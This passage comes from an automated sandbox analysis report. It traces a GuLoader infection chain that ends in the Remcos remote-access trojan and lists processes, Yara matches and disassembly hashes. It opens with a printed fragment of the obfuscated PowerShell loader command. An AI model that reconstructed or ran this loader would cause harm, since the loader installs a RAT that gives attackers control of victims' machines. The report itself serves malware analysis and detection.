bliNBeacTPatueBrecnIndaSUdsk)');while (!$Secernent) {Woodranger (Relationsdatabasemodellen 'Osvp$F nag WarlAfhooMuskb,leoaOystlJomf:GardGKo.teDagoaf derD emkKleraSj ps Ek sMoraeEnnes Er =Soli$Mortr.fske M,naRailtSmretBracrPhaniS ydbKugluSelst DeliT,kso Fu n') ;Woodranger $Cricotus;Woodranger (Relationsdatabasemodellen ' AriS CictT rkaAp,lRUdbeT Aan-PapeSTommlArite ntE H rPAn h Dep4');Woodranger (Relationsdatabasemodellen 'Se,e$Ag ngfakeLvindOC llb KimADeflL avo:PedaSblodETmmeCDisteEminR sdmN None ManNKa,rTSell= Az (SilkTIroneBaggS ritSuff-HorrPKatoaP,detRougHdr l Niv $AnaldUsafrVandiMa aVMin HTindUPre SIndkp,aprlA,uaA C nnPosttAla.eTubeNBasesUdsp)') ;Woodranger (Relationsdatabasemodellen 'cris$Re iGDiceLA.heOGirabOpsaarec LHvir:NondvSureiAd,oCVampTChaiI LanmEm liAntis fskI LacNKareGSche= er$CinegDespLSuspo ,aiB.pkkaBr.dlTi l:RustoJoosP.pans arntPrinOOptadPate+univ+Spio%Poly$MeanM upYThoraT lelIndbgIndiiPeruCPoor.HorrcAnnao ,ebuS rmnMel T') ;$statsretten=$Myalgic[$Victimising]}$Toxihemia=285000;$Houbara186=31460;Woodranger (Relationsdatabasemodellen ' Fej$CompgAfsvlLoggOAdytBSognaAntilR tc:Ps kIH ptn OveqProdUSoveiH kkeBolitIn,uUBi idiso ETek s Bol C.an=Koeo VladgB.trEWol.tEnv.- Va.c fo oOmstNSubstlsblER doNled.TSemi Coa$KoffDFyrrrGeneiE aiVAbsohSlaruEng SCrowPG rglI noASkr nIsolT AftePinsnRen s');Woodranger (Relationsdatabasemodellen 'hern$ C.ig G,nlPhagoEmanbBesta EkslS in:FordPPelauS rgiUninsNondtDkstiBacke But U de=g.ep Daa[MoniSO ery Ma s intC raeSt.mmIsle.tintCMitioCocknMirav Oble sacr Bekt Una]Angr:lay,:FiliFudkarSpilo,kabm amaB KutaRolfsFa te Le 6Hede4,xceS AtmtDialr GeniSphinTotagEnes(S et$FuldIPalenNrreq KanuOr,giDemee BabtC,cauXuhadChtheStansHerb)');Woodranger (Relationsdatabasemodellen 'Cust$GottgUna LSkiloDhy,B ChiaBaarlPale:GeneAChevpNondrUn eaBotoxNonmI,ekoa Rst2Apat2 Unl6Aud. Eent=Hy.r hom[ Fo StabuyBandsChipT SpaeRessm ,ss. AffT SubETe sXfrigtThog. .ubeKostnSpirC BeaoBa kDLivaiBiv n CocGMaha]expe: ,ip:Ad,eApasss.ygecHypoiSiphIBi t.NotegTraneSanst,gnosPerstAfisrStaniDryonOscugEdd (Kosm$ Ud,pHotluSejriGigasAndot unsI,umbeforb)');Woodranger (Relationsdatabasemodellen ' win$Gr sG ublS akOOp.aBunbeA.lanlPatu: U vmAandeE,sitWiseaEfteLLusto.onsPRoa.hAn u=Afhs$ TaraPot,PTalerAutoaudviXCen.i SkoARepr2Glyp2Arki6Klas.Ni esdukau PoobPurpsIntetSilkr SquI FjeNVellgsesa(Sol $EksptBilloBreeXS,seiA alh Gase Gl Mau diDrhaaUnco,Fol $ timhOv.rOS mmuPho.bfodeAForrr bonAOrri1Exa.8 A p6Tilb)');Woodranger $Metaloph;"
                                                              Imagebase:0x2f0000
                                                              File size:433'152 bytes
                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.2613266468.00000000080C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.2613657246.000000000BA9B000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.2599993582.000000000549C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:5
                                                              Start time:01:52:20
                                                              Start date:19/12/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff66e660000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:8
                                                              Start time:01:52:43
                                                              Start date:19/12/2024
                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                              Imagebase:0xe40000
                                                              File size:59'904 bytes
                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.2719001043.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:10
                                                              Start time:01:52:57
                                                              Start date:19/12/2024
                                                              Path:C:\ProgramData\Remcos\remcos.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\ProgramData\Remcos\remcos.exe"
                                                              Imagebase:0x380000
                                                              File size:59'904 bytes
                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Antivirus matches:
                                                              • Detection: 0%, ReversingLabs
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:11
                                                              Start time:01:53:07
                                                              Start date:19/12/2024
                                                              Path:C:\ProgramData\Remcos\remcos.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\ProgramData\Remcos\remcos.exe"
                                                              Imagebase:0x380000
                                                              File size:59'904 bytes
                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:12
                                                              Start time:01:53:16
                                                              Start date:19/12/2024
                                                              Path:C:\ProgramData\Remcos\remcos.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\ProgramData\Remcos\remcos.exe"
                                                              Imagebase:0x380000
                                                              File size:59'904 bytes
                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Disassembly

                                                              Reset < >

                                                                Executed Functions

                                                                Function 00007FFD3464AB13 Relevance: .5, Instructions: 482COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2415286566.00007FFD34640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd34640000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f0af8e68cdb668a204a8e34c7a607bdf066f8054490c0476ea7f4cfaddf2eb99
                                                                • Instruction ID: 4b6a121b4eb5ec222b338977845e951c0ffa3493ea7dd1d9069fd05f4d33f2e0
                                                                • Opcode Fuzzy Hash: f0af8e68cdb668a204a8e34c7a607bdf066f8054490c0476ea7f4cfaddf2eb99
                                                                • Instruction Fuzzy Hash: 45F19370A08A4D4FEFA8DF28D8967E937D1FF55310F04427AE84DC7291DB3899458B81
                                                                Function 00007FFD3464B8C2 Relevance: .5, Instructions: 456COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2415286566.00007FFD34640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd34640000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f8a16a0d337b6328ad632224607f5697fef9b443d924efb562f5913a0ccfe623
                                                                • Instruction ID: 87f06a0cc7ac6f97306ca5414a224fd75eb07ba2cdc6348b7c2279228c16e0c9
                                                                • Opcode Fuzzy Hash: f8a16a0d337b6328ad632224607f5697fef9b443d924efb562f5913a0ccfe623
                                                                • Instruction Fuzzy Hash: B0E1B330A08A4D8FEFA8DF28C8A57E977D1FB55310F04427ED84DC7295DE78A9458B81
                                                                Function 00007FFD3464CFBF Relevance: .7, Instructions: 665COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2415286566.00007FFD34640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd34640000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 719d9ef9685e9985870dc8c9797fb9da6405549276b119de2d6b45e637d7f3cf
                                                                • Instruction ID: 3d49916f09f0e32052b0e38533bc0d9be2f74f7c9c2edaa1dc17d3fdc9420447
                                                                • Opcode Fuzzy Hash: 719d9ef9685e9985870dc8c9797fb9da6405549276b119de2d6b45e637d7f3cf
                                                                • Instruction Fuzzy Hash: 0B227E30A18A5D8FDF98EF58C4A5AE977E1FFA9304F10017AD449D7396CA35E881CB80
                                                                Function 00007FFD3464B4D6 Relevance: .3, Instructions: 331COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2415286566.00007FFD34640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd34640000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: dce7185c8d09f85bcf21d9af4a1fb67761c786601f692ad7756ad05ee2cd8b30
                                                                • Instruction ID: 71a723ad80b7b9e03b5ee6925673fc9b755b6b2db8987b305b7f5d8811885db6
                                                                • Opcode Fuzzy Hash: dce7185c8d09f85bcf21d9af4a1fb67761c786601f692ad7756ad05ee2cd8b30
                                                                • Instruction Fuzzy Hash: 60B1C630A08A4D4FEFA8DF28D8557E93BE1EF55310F04427EE84DC7292CA789945CB82
                                                                Function 00007FFD347189F0 Relevance: .2, Instructions: 169COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2415758679.00007FFD34710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd34710000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 53e546f739b52cfc9301162faee75e7286413b12db01409c22037e639a6aeef3
                                                                • Instruction ID: d66966cc2728f1fff46631f364d4cb015cd57d28bd1ee089aeacef0e5929b2c9
                                                                • Opcode Fuzzy Hash: 53e546f739b52cfc9301162faee75e7286413b12db01409c22037e639a6aeef3
                                                                • Instruction Fuzzy Hash: 4951F562B0DB854FE765EA5888A62A8B7E1EF56310F0501BED04DC7193DD2CBC45D782
                                                                Function 00007FFD3464AFD4 Relevance: .1, Instructions: 91COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2415286566.00007FFD34640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd34640000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 10f976b67f8140d07fc9a25ab77695c1ba08620a2533c77213d19038fab16d41
                                                                • Instruction ID: f4a1b6de374e141db955f7f9d31039705b7b915900b1d4a5fa9892be82306fc7
                                                                • Opcode Fuzzy Hash: 10f976b67f8140d07fc9a25ab77695c1ba08620a2533c77213d19038fab16d41
                                                                • Instruction Fuzzy Hash: 79314030A1856D8EFFB8DF14CCA6BF932A0FF42B15F400539D50DC6292CA3C6985DA11
                                                                Function 00007FFD34713E2A Relevance: .1, Instructions: 87COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2415758679.00007FFD34710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd34710000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 84daf245385b7ba79283bcb0d9b1c76234ef89c6ff894a56ef51a08c5978b53f
                                                                • Instruction ID: c64930a82bc407eab8ced4b473781931f3060f545fc984bc31813030c4cb7773
                                                                • Opcode Fuzzy Hash: 84daf245385b7ba79283bcb0d9b1c76234ef89c6ff894a56ef51a08c5978b53f
                                                                • Instruction Fuzzy Hash: 2221B372F0DB4A4BF7A9A66C54E527572D2EF86250B4800BAE14CC3193DD2DFC099381
                                                                Function 00007FFD34714EB1 Relevance: .1, Instructions: 61COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2415758679.00007FFD34710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd34710000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fb52f0713a782040a8a5b733cd0a851ddd3339a7141601545c357ff1a254c8a7
                                                                • Instruction ID: e527ae5fbe4793e16cf2e83ad989d5587d9cc1e1f841ef4fd6cd232e20630cf8
                                                                • Opcode Fuzzy Hash: fb52f0713a782040a8a5b733cd0a851ddd3339a7141601545c357ff1a254c8a7
                                                                • Instruction Fuzzy Hash: F6014963F1EA9A4FE7B4AAAC28A52B8B6E1EF5571074801F6E50CD32D3DC0C7C0492C1
                                                                Function 00007FFD346435A8 Relevance: .1, Instructions: 57COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2415286566.00007FFD34640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd34640000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b1f2a3fb5816e473b100584740a20a92a24681d053007385ae615d97f0bce4ab
                                                                • Instruction ID: ee42848eff60b601735d4773412060ae9812cb9d135d75ee212a5a430c9806ef
                                                                • Opcode Fuzzy Hash: b1f2a3fb5816e473b100584740a20a92a24681d053007385ae615d97f0bce4ab
                                                                • Instruction Fuzzy Hash: DE11087260D7C44FE7168F68A8626A07FB0EF43230B0801EFD0C9CB1E3D11A998AD752
                                                                Function 00007FFD34643535 Relevance: .0, Instructions: 49COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2415286566.00007FFD34640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd34640000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3ab7f0e4f2eca000da6385149aea868f5c5daf12a19827b00dc52fc6463f9bfe
                                                                • Instruction ID: b9e0aaf9bf965b587c22c845905763fadf91ba910a7b9fff9ab4f4c8e8cc8924
                                                                • Opcode Fuzzy Hash: 3ab7f0e4f2eca000da6385149aea868f5c5daf12a19827b00dc52fc6463f9bfe
                                                                • Instruction Fuzzy Hash: 1301A73020CB0C4FDB48EF0CE051AA5B7E0FB95324F10052DE58AC3651DA36E881CB45
                                                                Function 00007FFD347180AA Relevance: .0, Instructions: 37COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2415758679.00007FFD34710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd34710000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b50de1c5e075fa0808636133d6d4dc1cddb6533937e9090b1b047abf7fce3d91
                                                                • Instruction ID: 95bfa7166fb118b17fbfb56df5ab054a66ef28815dca964f8fba8b5b9e530640
                                                                • Opcode Fuzzy Hash: b50de1c5e075fa0808636133d6d4dc1cddb6533937e9090b1b047abf7fce3d91
                                                                • Instruction Fuzzy Hash: 40F02B33B0CD0D4EE395966C64552F673D2EFC5131B454277C15EC3152ED29E8178240
                                                                Function 00007FFD34718469 Relevance: .0, Instructions: 30COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2415758679.00007FFD34710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd34710000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9b6c32459647d52704f95d9a049036c4fe351c5dcf3fbacb11c04b1c0a3a3db4
                                                                • Instruction ID: 88b7e3355e64ac3304af44499f9b44b262a376887bcbb9c3086d015101ad54ae
                                                                • Opcode Fuzzy Hash: 9b6c32459647d52704f95d9a049036c4fe351c5dcf3fbacb11c04b1c0a3a3db4
                                                                • Instruction Fuzzy Hash: 37E0D873B0DB050DFB58995C68621F9B3D1DF82120754047FD24EC2043DC1EB8228280
                                                                Function 00007FFD347186CE Relevance: .0, Instructions: 30COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2415758679.00007FFD34710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd34710000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a1a9861849f9f0fe1fc262732bab6eefb124e3c4c0560a2bb7b337cda1d2e133
                                                                • Instruction ID: 72b308793116d7265cbebece72a75c5dfcdeebd96f976ead54f094f811e83036
                                                                • Opcode Fuzzy Hash: a1a9861849f9f0fe1fc262732bab6eefb124e3c4c0560a2bb7b337cda1d2e133
                                                                • Instruction Fuzzy Hash: E4E0923270DD894FDF95EA5C94D19A477E0EF6932030401AAE40DC7197DD1DEC94C781
                                                                Function 00007FFD3471122A Relevance: .0, Instructions: 29COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2415758679.00007FFD34710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd34710000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ed1cdbe68cd323768d4443f8c1390e6271ae76bfce8cd71f851b0308ecc3daf4
                                                                • Instruction ID: e35a133f29c0fba5be8949240cc53dfa45d6653c513e85d2b479747cf0484c0f
                                                                • Opcode Fuzzy Hash: ed1cdbe68cd323768d4443f8c1390e6271ae76bfce8cd71f851b0308ecc3daf4
                                                                • Instruction Fuzzy Hash: CDE02253B0EA854FE784667C046916866E1EB9A29031041BBE00DCB1A3DC1C6C088751

                                                                Non-executed Functions

                                                                Function 00007FFD3464C4A0 Relevance: 2.4, Strings: 1, Instructions: 1100COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2415286566.00007FFD34640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd34640000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: _
                                                                • API String ID: 0-701932520
                                                                • Opcode ID: 732f55f75ba2f5c0ff1b91d0f21e9a6a14d176a7a82144a38b9a3ce2075cf736
                                                                • Instruction ID: c41e0527308e781b67abc1bc2562b02675315ed1a872de369b0470dd09d0ca89
                                                                • Opcode Fuzzy Hash: 732f55f75ba2f5c0ff1b91d0f21e9a6a14d176a7a82144a38b9a3ce2075cf736
                                                                • Instruction Fuzzy Hash: 9B229827B0D6B25EE7125F6CA8B51F93F60DF93225B1A00B3C3C8CE293D91C654A9791
                                                                Function 00007FFD34643A35 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2415286566.00007FFD34640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd34640000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: O_^
                                                                • API String ID: 0-2524604163
                                                                • Opcode ID: dc535516415786d90d0b9c1188ba1869c119be908f0b5e0da1b03c49dbcc8551
                                                                • Instruction ID: baaebf9e0c1ed3410b6041f204ae372894053754007a5e5b9e28b651b3b60ce3
                                                                • Opcode Fuzzy Hash: dc535516415786d90d0b9c1188ba1869c119be908f0b5e0da1b03c49dbcc8551
                                                                • Instruction Fuzzy Hash: B351BD26B0D7D39EE6065B3858B21E53FA1EFA322470901B7C2D4CE1F3EA186946D761
                                                                Function 00007FFD3464363D Relevance: .2, Instructions: 207COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2415286566.00007FFD34640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd34640000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ebefe0a0098d854328ecfb021f8edc4eeb0c7d9f369b4050b54de0f295d86dcb
                                                                • Instruction ID: 2ade685c6c0bab60c8aebd27bec9945e12152484e8f1321fc31c0d99d7f11be1
                                                                • Opcode Fuzzy Hash: ebefe0a0098d854328ecfb021f8edc4eeb0c7d9f369b4050b54de0f295d86dcb
                                                                • Instruction Fuzzy Hash: 0A61B263F0E7D21FE7570A3818750E93FA1AF93224B4A11F7C5D88E2E3D9099446A751

                                                                Executed Functions

                                                                Function 0278E928 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2582668334.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_2780000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: \V(m
                                                                • API String ID: 0-2800782923
                                                                • Opcode ID: f6190c43954d8e93de673edb5e92b6f477598a6dac32b838b4c44209e6520866
                                                                • Instruction ID: 975972ace091a75ba70c7700ba6140eefc4743f117a91ba9170d2784c4487001
                                                                • Opcode Fuzzy Hash: f6190c43954d8e93de673edb5e92b6f477598a6dac32b838b4c44209e6520866
                                                                • Instruction Fuzzy Hash: E3B15B70E40219CFDF11DFA9C8857AEBBF2BF88714F148129E815A7294EB749845CF85
                                                                Function 0278F1F8 Relevance: .3, Instructions: 266COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2582668334.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_2780000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1ac35152f2b8d6bdba2892c4bc376f460e29a9a35b8722e99ec885ba3df61824
                                                                • Instruction ID: 3439b6e2a1452805985efc0f93b6b14acbaf83cefc80967776dd26615f4fc5e9
                                                                • Opcode Fuzzy Hash: 1ac35152f2b8d6bdba2892c4bc376f460e29a9a35b8722e99ec885ba3df61824
                                                                • Instruction Fuzzy Hash: 9BB18E70E402198FDB10DFA9C88579EBBF2BF88314F548129D815E7694EB749841CF82
                                                                Function 02789219 Relevance: .1, Instructions: 120COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2582668334.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_2780000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 15eb156b238bd7b56a29c6258029e9a35ade3264a89260096f5117955568e871
                                                                • Instruction ID: 87d05f14c8def0f2674156b2b42399c69141497c0e9abdaabd63187752b3fd79
                                                                • Opcode Fuzzy Hash: 15eb156b238bd7b56a29c6258029e9a35ade3264a89260096f5117955568e871
                                                                • Instruction Fuzzy Hash: 0F417C31B40200DFD718EBA4D958ABE7BB6EF89350F195468E506EB7A1CB359C41CB50
                                                                Function 06EF55D8 Relevance: 9.8, Strings: 7, Instructions: 1016COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2608511495.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (fMl$(fMl$(fMl$(fMl$x.>k$x.>k$->k
                                                                • API String ID: 0-3505570286
                                                                • Opcode ID: 9145edc7209af807143fb7bda2bfc278f68b0b09fc24cc43172dd36c23282b78
                                                                • Instruction ID: f6bbd769d5007b72cddc69fb66af058efcc3b68c9459419478f3e5513b8847d2
                                                                • Opcode Fuzzy Hash: 9145edc7209af807143fb7bda2bfc278f68b0b09fc24cc43172dd36c23282b78
                                                                • Instruction Fuzzy Hash: F982A174B10314DFEB64DB68C850FAABBF2AB95314F1184A9D605AF385CB31ED41CBA1
                                                                Function 0278AE30 Relevance: 6.8, Strings: 5, Instructions: 519COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2582668334.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_2780000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 8N(m$h](m$h](m$h](m$I(m
                                                                • API String ID: 0-4108924942
                                                                • Opcode ID: 9d0aac8a189aba98c5252e96a3fc26d98251dc6303212206cab5c0eb7d22e9dc
                                                                • Instruction ID: 8a7c63a5d8bc1e30a84e5fcfa3bf71c926623038ac0d8b3973c71ef9d0ed7d1a
                                                                • Opcode Fuzzy Hash: 9d0aac8a189aba98c5252e96a3fc26d98251dc6303212206cab5c0eb7d22e9dc
                                                                • Instruction Fuzzy Hash: AF225034B00154CFCB29EB24D8547AEB7F6AF8A305F1580A9D50AAB3A1CF359D85CF91
                                                                Function 06EF5FEB Relevance: 6.6, Strings: 5, Instructions: 395COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2608511495.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (fMl$(fMl$x.>k$x.>k$->k
                                                                • API String ID: 0-817019584
                                                                • Opcode ID: 9d9b6d8cc90c57bab48c219c6c1f37de146285f5effbe138bf83aed94050306b
                                                                • Instruction ID: b0a49ed93d1732e69db731d7bdcf0521111a9e0dfe79a31b6d7d43caf28eca5b
                                                                • Opcode Fuzzy Hash: 9d9b6d8cc90c57bab48c219c6c1f37de146285f5effbe138bf83aed94050306b
                                                                • Instruction Fuzzy Hash: AAF18034B102149FE724EB68C961F6EB7B3AF85304F1184A9D6096F395CB72ED818F91
                                                                Function 06EF65DB Relevance: 5.4, Strings: 4, Instructions: 440COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2608511495.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (fMl$(fMl$(fMl$x.>k
